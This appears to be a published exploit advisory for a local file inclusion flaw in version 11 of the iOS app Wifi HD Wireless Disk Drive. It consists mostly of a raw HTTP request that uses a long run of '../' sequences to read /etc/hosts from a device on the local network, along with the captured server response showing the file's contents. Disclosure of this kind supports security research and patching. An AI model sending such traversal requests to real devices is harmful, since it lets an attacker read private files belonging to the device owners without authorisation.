Headline
Wifi HD Wireless Disk Drive 11 Local File Inclusion
Wifi HD Wireless Disk Drive version 11 suffers from a local file inclusion vulnerability.
# Exploit Title: Wifi HD Wireless Disk Drive Local File Inclusion# Date: Aug 13, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: http://www.savysoda.com# Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/id311170976# Version: 11# Tested on: iPhone OS 15_5GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1Host: 192.168.1.100Connection: closeUpgrade-Insecure-Requests: 1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/604.1Referer: http://192.168.1.103/Accept-Language: en-GB,en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflate-----------------HTTP/1.1 200 OKContent-Disposition: attachmentContent-Type: application/downloadContent-Length: 213Accept-Ranges: bytesDate: Sat, 13 Aug 2022 03:33:30 GMT### Host Database## localhost is used to configure the loopback interface# when the system is booting. Do not change this entry.##127.0.0.1 localhost255.255.255.255 broadcasthost::1 localhost